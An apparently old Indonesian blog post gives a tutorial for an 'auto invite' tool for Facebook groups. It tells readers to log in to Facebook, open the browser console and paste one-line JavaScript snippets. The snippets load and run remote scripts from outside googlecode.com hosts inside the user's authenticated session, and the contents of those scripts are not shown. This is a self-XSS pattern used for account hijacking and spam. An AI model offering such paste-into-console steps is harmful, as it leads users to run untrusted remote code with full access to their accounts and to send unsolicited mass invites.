Script Auto Invite Grup Facebook

|



Kali ini saya akan share script auto invite grup+Tutornya xD
Langsung saja

Untuk Browser Mozila (Work udh ane Test)
1. buka browser mozilla
2. lalu login FB sobat
3. masuk ke group yang udah sobat buat 
4. lalu tekan  CTRL + SHIFT + K Pada keyboard sobat
5. lalu Copy & Paste code Ini :


document.body.appendChild(document.createElement('script')).src='http://vikrymadz.googlecode.com/files/AutoInviteGroup.js';

6. tekan ENTER
7. tunggu prosesnya selesai dan tara PC meleduk xD (Bercanda)
NB:Pengaturan Grup di buat terbuka ya

Untuk Google Crome (No Tested)
1. buka browser Google Crome
2. lagin FB
3. masuk grup yg sudah agan buat
4. tekan CTRL+SHIFT+J pada keyboard
5. copy paste code di bawah ini:

document.body.appendChild(
document.createElement('sc
ript')).src='http://gosite-script.googlecode.com/files/gosite-groupinvite-final.js'; 
 NB:Pengaturan Grup di buat terbuka ya
Sekian dari saya apabila ada salah saya mohon maaf karena saya hanya manusia biasa 

0 komentar:

Posting Komentar